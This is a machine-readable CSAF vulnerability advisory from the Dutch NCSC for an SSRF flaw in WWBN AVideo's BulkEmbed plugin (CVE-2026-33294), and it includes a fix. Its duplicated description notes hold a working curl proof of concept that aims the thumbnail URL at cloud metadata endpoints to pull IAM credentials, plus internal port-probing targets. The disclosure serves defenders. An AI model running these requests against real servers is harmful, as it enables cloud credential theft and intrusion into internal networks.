{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33294",
        "tracking": {
            "current_release_date": "2026-03-29T16:14:50.660199Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33294",
            "initial_release_date": "2026-03-20T15:28:51.640094Z",
            "revision_history": [
                {
                    "date": "2026-03-20T15:28:51.640094Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T15:28:57.672959Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-22T17:24:46.973047Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-22T17:24:56.215045Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-22T17:39:07.104690Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-22T17:39:17.247175Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-23T07:35:52.574609Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T21:27:03.051024Z",
                    "number": "8",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-24T21:27:13.881697Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T21:37:41.407622Z",
                    "number": "10",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-24T21:37:43.839367Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T14:39:33.109241Z",
                    "number": "12",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-25T14:39:35.134352Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:41:57.860420Z",
                    "number": "14",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-26T00:47:25.456636Z",
                    "number": "15",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (17).| Product Identifiers created (16).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T00:47:37.751892Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-29T03:16:15.706923Z",
                    "number": "17",
                    "summary": "References removed (2)."
                },
                {
                    "date": "2026-03-29T03:16:18.324022Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-29T16:14:22.043148Z",
                    "number": "19",
                    "summary": "References created (2)."
                }
            ],
            "status": "interim",
            "version": "19"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<26.0",
                                "product": {
                                    "name": "vers:unknown/<26.0",
                                    "product_id": "CSAFPID-5874460",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "AVideo"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.4",
                                "product": {
                                    "name": "vers:unknown/10.4",
                                    "product_id": "CSAFPID-5656122",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.8",
                                "product": {
                                    "name": "vers:unknown/10.8",
                                    "product_id": "CSAFPID-5656123",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11",
                                "product": {
                                    "name": "vers:unknown/11",
                                    "product_id": "CSAFPID-5656124",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1",
                                "product": {
                                    "name": "vers:unknown/11.1",
                                    "product_id": "CSAFPID-5656125",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1.1",
                                "product": {
                                    "name": "vers:unknown/11.1.1",
                                    "product_id": "CSAFPID-5656126",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.5",
                                "product": {
                                    "name": "vers:unknown/11.5",
                                    "product_id": "CSAFPID-5656127",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.6",
                                "product": {
                                    "name": "vers:unknown/11.6",
                                    "product_id": "CSAFPID-5656128",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/12.4",
                                "product": {
                                    "name": "vers:unknown/12.4",
                                    "product_id": "CSAFPID-5656129",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@12.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3",
                                "product": {
                                    "name": "vers:unknown/14.3",
                                    "product_id": "CSAFPID-5656130",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3.1",
                                "product": {
                                    "name": "vers:unknown/14.3.1",
                                    "product_id": "CSAFPID-5656131",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.4",
                                "product": {
                                    "name": "vers:unknown/14.4",
                                    "product_id": "CSAFPID-5656132",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/18.0",
                                "product": {
                                    "name": "vers:unknown/18.0",
                                    "product_id": "CSAFPID-5656133",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@18.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/21.0",
                                "product": {
                                    "name": "vers:unknown/21.0",
                                    "product_id": "CSAFPID-5721197",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@21.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/22.0",
                                "product": {
                                    "name": "vers:unknown/22.0",
                                    "product_id": "CSAFPID-5772271",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@22.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/24.0",
                                "product": {
                                    "name": "vers:unknown/24.0",
                                    "product_id": "CSAFPID-5772272",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@24.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/25.0",
                                "product": {
                                    "name": "vers:unknown/25.0",
                                    "product_id": "CSAFPID-5840723",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@25.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=25.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<=25.0",
                                    "product_id": "CSAFPID-5840724"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "avideo"
                    }
                ],
                "category": "vendor",
                "name": "WWBN"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33294",
            "cwe": {
                "id": "CWE-918",
                "name": "Server-Side Request Forgery (SSRF)"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\n\nThe BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail.\n\n## Details\n\nWhen saving bulk-embedded videos, user-supplied thumbnail URLs from `$_POST['itemsToSave'][x]['thumbs']` flow directly into `url_get_contents()` with no SSRF validation:\n\n**`plugin/BulkEmbed/save.json.php:68-105`**\n```php\nforeach ($_POST['itemsToSave'] as $value) {\n    foreach ($value as $key => $value2) {\n        $value[$key] = xss_esc($value2);  // HTML entity encoding — irrelevant for SSRF\n    }\n    // ...\n    $poster = Video::getPathToFile(\"{$paths['filename']}.jpg\");\n    $thumbs = $value['thumbs'];              // ← attacker-controlled URL\n    if (!empty($thumbs)) {\n        $contentThumbs = url_get_contents($thumbs);  // ← fetched without SSRF check\n        if (!empty($contentThumbs)) {\n            make_path($poster);\n            $bytes = file_put_contents($poster, $contentThumbs);  // ← response saved to disk\n        }\n    }\n    // ...\n    $videos->setStatus('a');  // ← video set to active, thumbnail publicly accessible\n```\n\nThe `url_get_contents()` function internally calls `isValidURLOrPath()` which only validates URL format (scheme, host presence) — it does **not** block requests to private IPs, localhost, or cloud metadata endpoints.\n\n**All other URL-fetching endpoints are protected.** The `isSSRFSafeURL()` function is called in:\n- `plugin/Scheduler/Scheduler.php`\n- `plugin/LiveLinks/proxy.php` (two call sites)\n- `plugin/AI/receiveAsync.json.php`\n- `objects/aVideoEncoder.json.php`\n- 
`objects/aVideoEncoderReceiveImage.json.php`\n\nBulkEmbed is the only URL-fetching endpoint that was not hardened.\n\n**This is a full-read SSRF**, not blind — the HTTP response body is written to disk as the video thumbnail and served to the attacker when they view the video poster image.\n\n## PoC\n\n**Prerequisites:** Authenticated session with BulkEmbed permission. The `onlyAdminCanBulkEmbed` option defaults to `true` (line 41 of `BulkEmbed.php`), but is commonly disabled for multi-user platforms.\n\n**Step 1: Authenticate and obtain session cookie**\n\n```bash\nCOOKIE=$(curl -s -c - \"http://avideo.local/user\" \\\n  -d \"user=testuser&pass=testpass&redirectUri=/\" | grep PHPSESSID | awk '{print $NF}')\n```\n\n**Step 2: Send BulkEmbed save request with internal URL as thumbnail**\n\n```bash\ncurl -s -b \"PHPSESSID=$COOKIE\" \\\n  \"http://avideo.local/plugin/BulkEmbed/save.json.php\" \\\n  -d \"itemsToSave[0][title]=SSRF+Test\" \\\n  -d \"itemsToSave[0][description]=test\" \\\n  -d \"itemsToSave[0][duration]=PT1M\" \\\n  -d \"itemsToSave[0][link]=https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \\\n  -d \"itemsToSave[0][thumbs]=http://169.254.169.254/latest/meta-data/iam/security-credentials/\" \\\n  -d \"itemsToSave[0][date]=\"\n```\n\n**Expected response:**\n\n```json\n{\"error\":false,\"msg\":[{\"video\":{...},\"value\":{...},\"videos_id\":123}],\"playListId\":0}\n```\n\n**Step 3: Retrieve the SSRF response from the saved thumbnail**\n\n```bash\n# Extract the filename from the response, then fetch the poster image\ncurl -s \"http://avideo.local/videos/(unknown).jpg\"\n```\n\nThe content of the internal HTTP response (e.g., AWS IAM role names from the metadata service) is returned as the image file content.\n\n**Cloud metadata example targets:**\n- `http://169.254.169.254/latest/meta-data/iam/security-credentials/` — AWS IAM role names\n- `http://169.254.169.254/latest/meta-data/iam/security-credentials/{role}` — temporary AWS credentials\n- 
`http://metadata.google.internal/computeMetadata/v1/` — GCP metadata (requires header, may not work)\n- `http://169.254.169.254/metadata/instance?api-version=2021-02-01` — Azure instance metadata\n\n**Internal network scanning:**\n- `http://10.0.0.1:8080/` — probe internal services\n- `http://localhost:3306/` — probe local database ports\n\n## Impact\n\n- **Cloud credential theft:** On AWS/GCP/Azure-hosted instances, an attacker can retrieve cloud IAM credentials from the metadata service, potentially gaining access to cloud infrastructure (S3 buckets, databases, other services).\n- **Internal network reconnaissance:** Attacker can map internal network topology by probing private IP ranges and observing which requests return content vs. timeout.\n- **Internal service data exfiltration:** Any HTTP-accessible internal service (admin panels, monitoring dashboards, databases with HTTP interfaces) can have its responses exfiltrated through the thumbnail mechanism.\n- **Scope change:** The attack crosses security boundaries — from the web application into the internal network/cloud infrastructure, which is a different trust zone.\n\n## Recommended Fix\n\nAdd `isSSRFSafeURL()` validation before the `url_get_contents()` call in `plugin/BulkEmbed/save.json.php`, consistent with all other URL-fetching endpoints:\n\n```php\n    $thumbs = $value['thumbs'];\n    if (!empty($thumbs)) {\n        if (!isSSRFSafeURL($thumbs)) {\n            _error_log(\"BulkEmbed: SSRF protection blocked thumbnail URL: \" . $thumbs);\n            continue;\n        }\n        $contentThumbs = url_get_contents($thumbs);\n        if (!empty($contentThumbs)) {\n            make_path($poster);\n            $bytes = file_put_contents($poster, $contentThumbs);\n            _error_log(\"thumbs={$thumbs} poster=$poster bytes=$bytes strlen=\" . strlen($contentThumbs));\n        } else {\n            _error_log(\"ERROR thumbs={$thumbs} poster=$poster\");\n        }\n    }\n```",
                    "title": "github - https://api.github.com/advisories/GHSA-66cw-h2mj-j39p"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33294"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, the BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail. Version 26.0 fixes the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33294.json"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe BulkEmbed plugin's save endpoint (`plugin/BulkEmbed/save.json.php`) fetches user-supplied thumbnail URLs via `url_get_contents()` without SSRF protection. Unlike all six other URL-fetching endpoints in AVideo that were hardened with `isSSRFSafeURL()`, this code path was missed. An authenticated attacker can force the server to make HTTP requests to internal network resources and retrieve the responses by viewing the saved video thumbnail.\n\n## Details\n\nWhen saving bulk-embedded videos, user-supplied thumbnail URLs from `$_POST['itemsToSave'][x]['thumbs']` flow directly into `url_get_contents()` with no SSRF validation:\n\n**`plugin/BulkEmbed/save.json.php:68-105`**\n```php\nforeach ($_POST['itemsToSave'] as $value) {\n    foreach ($value as $key => $value2) {\n        $value[$key] = xss_esc($value2);  // HTML entity encoding — irrelevant for SSRF\n    }\n    // ...\n    $poster = Video::getPathToFile(\"{$paths['filename']}.jpg\");\n    $thumbs = $value['thumbs'];              // ← attacker-controlled URL\n    if (!empty($thumbs)) {\n        $contentThumbs = url_get_contents($thumbs);  // ← fetched without SSRF check\n        if (!empty($contentThumbs)) {\n            make_path($poster);\n            $bytes = file_put_contents($poster, $contentThumbs);  // ← response saved to disk\n        }\n    }\n    // ...\n    $videos->setStatus('a');  // ← video set to active, thumbnail publicly accessible\n```\n\nThe `url_get_contents()` function internally calls `isValidURLOrPath()` which only validates URL format (scheme, host presence) — it does **not** block requests to private IPs, localhost, or cloud metadata endpoints.\n\n**All other URL-fetching endpoints are protected.** The `isSSRFSafeURL()` function is called in:\n- `plugin/Scheduler/Scheduler.php`\n- `plugin/LiveLinks/proxy.php` (two call sites)\n- `plugin/AI/receiveAsync.json.php`\n- `objects/aVideoEncoder.json.php`\n- 
`objects/aVideoEncoderReceiveImage.json.php`\n\nBulkEmbed is the only URL-fetching endpoint that was not hardened.\n\n**This is a full-read SSRF**, not blind — the HTTP response body is written to disk as the video thumbnail and served to the attacker when they view the video poster image.\n\n## PoC\n\n**Prerequisites:** Authenticated session with BulkEmbed permission. The `onlyAdminCanBulkEmbed` option defaults to `true` (line 41 of `BulkEmbed.php`), but is commonly disabled for multi-user platforms.\n\n**Step 1: Authenticate and obtain session cookie**\n\n```bash\nCOOKIE=$(curl -s -c - \"http://avideo.local/user\" \\\n  -d \"user=testuser&pass=testpass&redirectUri=/\" | grep PHPSESSID | awk '{print $NF}')\n```\n\n**Step 2: Send BulkEmbed save request with internal URL as thumbnail**\n\n```bash\ncurl -s -b \"PHPSESSID=$COOKIE\" \\\n  \"http://avideo.local/plugin/BulkEmbed/save.json.php\" \\\n  -d \"itemsToSave[0][title]=SSRF+Test\" \\\n  -d \"itemsToSave[0][description]=test\" \\\n  -d \"itemsToSave[0][duration]=PT1M\" \\\n  -d \"itemsToSave[0][link]=https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \\\n  -d \"itemsToSave[0][thumbs]=http://169.254.169.254/latest/meta-data/iam/security-credentials/\" \\\n  -d \"itemsToSave[0][date]=\"\n```\n\n**Expected response:**\n\n```json\n{\"error\":false,\"msg\":[{\"video\":{...},\"value\":{...},\"videos_id\":123}],\"playListId\":0}\n```\n\n**Step 3: Retrieve the SSRF response from the saved thumbnail**\n\n```bash\n# Extract the filename from the response, then fetch the poster image\ncurl -s \"http://avideo.local/videos/(unknown).jpg\"\n```\n\nThe content of the internal HTTP response (e.g., AWS IAM role names from the metadata service) is returned as the image file content.\n\n**Cloud metadata example targets:**\n- `http://169.254.169.254/latest/meta-data/iam/security-credentials/` — AWS IAM role names\n- `http://169.254.169.254/latest/meta-data/iam/security-credentials/{role}` — temporary AWS credentials\n- 
`http://metadata.google.internal/computeMetadata/v1/` — GCP metadata (requires header, may not work)\n- `http://169.254.169.254/metadata/instance?api-version=2021-02-01` — Azure instance metadata\n\n**Internal network scanning:**\n- `http://10.0.0.1:8080/` — probe internal services\n- `http://localhost:3306/` — probe local database ports\n\n## Impact\n\n- **Cloud credential theft:** On AWS/GCP/Azure-hosted instances, an attacker can retrieve cloud IAM credentials from the metadata service, potentially gaining access to cloud infrastructure (S3 buckets, databases, other services).\n- **Internal network reconnaissance:** Attacker can map internal network topology by probing private IP ranges and observing which requests return content vs. timeout.\n- **Internal service data exfiltration:** Any HTTP-accessible internal service (admin panels, monitoring dashboards, databases with HTTP interfaces) can have its responses exfiltrated through the thumbnail mechanism.\n- **Scope change:** The attack crosses security boundaries — from the web application into the internal network/cloud infrastructure, which is a different trust zone.\n\n## Recommended Fix\n\nAdd `isSSRFSafeURL()` validation before the `url_get_contents()` call in `plugin/BulkEmbed/save.json.php`, consistent with all other URL-fetching endpoints:\n\n```php\n    $thumbs = $value['thumbs'];\n    if (!empty($thumbs)) {\n        if (!isSSRFSafeURL($thumbs)) {\n            _error_log(\"BulkEmbed: SSRF protection blocked thumbnail URL: \" . $thumbs);\n            continue;\n        }\n        $contentThumbs = url_get_contents($thumbs);\n        if (!empty($contentThumbs)) {\n            make_path($poster);\n            $bytes = file_put_contents($poster, $contentThumbs);\n            _error_log(\"thumbs={$thumbs} poster=$poster bytes=$bytes strlen=\" . strlen($contentThumbs));\n        } else {\n            _error_log(\"ERROR thumbs={$thumbs} poster=$poster\");\n        }\n    }\n```",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-66cw-h2mj-j39p.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00025",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.7",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Exploit code publicly available, There is exploit data available from source Nvd, The value of the most recent EPSS score, Is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5874460",
                    "CSAFPID-5656122",
                    "CSAFPID-5656123",
                    "CSAFPID-5656124",
                    "CSAFPID-5656125",
                    "CSAFPID-5656126",
                    "CSAFPID-5656127",
                    "CSAFPID-5656128",
                    "CSAFPID-5656129",
                    "CSAFPID-5656130",
                    "CSAFPID-5656131",
                    "CSAFPID-5656132",
                    "CSAFPID-5656133",
                    "CSAFPID-5721197",
                    "CSAFPID-5772271",
                    "CSAFPID-5772272",
                    "CSAFPID-5840723",
                    "CSAFPID-5840724"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-66cw-h2mj-j39p"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33294"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33294.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-66cw-h2mj-j39p.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-66cw-h2mj-j39p"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-66cw-h2mj-j39p"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/commit/4589a3a089baf4ea439481f5088b38a8aa9c82b6"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33294"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
                        "baseScore": 5.0,
                        "baseSeverity": "MEDIUM"
                    },
                    "products": [
                        "CSAFPID-5656122",
                        "CSAFPID-5656123",
                        "CSAFPID-5656124",
                        "CSAFPID-5656125",
                        "CSAFPID-5656126",
                        "CSAFPID-5656127",
                        "CSAFPID-5656128",
                        "CSAFPID-5656129",
                        "CSAFPID-5656130",
                        "CSAFPID-5656131",
                        "CSAFPID-5656132",
                        "CSAFPID-5656133",
                        "CSAFPID-5721197",
                        "CSAFPID-5772271",
                        "CSAFPID-5772272",
                        "CSAFPID-5840723",
                        "CSAFPID-5840724",
                        "CSAFPID-5874460"
                    ]
                }
            ],
            "title": "CVE-2026-33294"
        }
    ]
}